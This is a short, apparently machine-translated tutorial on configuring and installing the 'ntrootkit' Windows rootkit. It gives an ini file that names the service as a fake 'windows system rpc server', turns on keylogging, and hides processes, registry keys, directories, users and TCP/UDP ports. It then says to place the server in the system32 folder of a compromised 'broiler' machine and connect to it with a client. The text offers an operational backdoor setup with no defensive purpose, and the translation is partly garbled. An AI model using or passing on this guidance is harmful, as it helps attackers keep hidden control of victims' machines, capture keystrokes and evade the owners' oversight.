The configuration of Rootkit's ntrootkit uses
NTrootkit
First, configuration method
\\ filename:ntrootkit.ini
\\ This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\ can't be installedhands!
[GLOBAL] / / the following is the configuration
\\ servicename is the ntrootkit's servicename
Servicename=tsserver / / Service name
Servdispname=rpcsvr
Servdescription=windows system rpc server
Installdir=com\ sserver / / installation directory
Connpass=12345 / / connection password
Appname=51cto.exe
Keylog=0 / / 0 means keyboard is not recorded
Workmode=1 / / 0 is sniffer mode
[HIDDEN PROCNAME] / / Service name to be hidden
51cto
[HIDDEN REGKEY] / / Registry keys to be hidden
Zero\ soft\...\...\ xxx
[HIDDEN REGVALUE] / / Registry key value to be hidden
Zero\ soft\...
[HIDDEN FILEDIR] / / File directory to be hidden
C:\ rootkit
[HIDDEN SERVICE] / / Service name to be hidden
Servicert
[HIDDEN USER] / / user name to hide
Zerosecurity
[HIDDEN TCPPORT] / / tcp port to be hidden
Tcpport=5768
[HIDDEN UDPPORT] / / udp port to be hidden
Udpport=4000
Second, method of use
①: put the configuration file .ini and server ntrootkit.exe in the system32 directory of the broiler, and then run the ntrootkit.exe installation; ntrootkit-u password can be uninstalled
②: clients connect with rtclient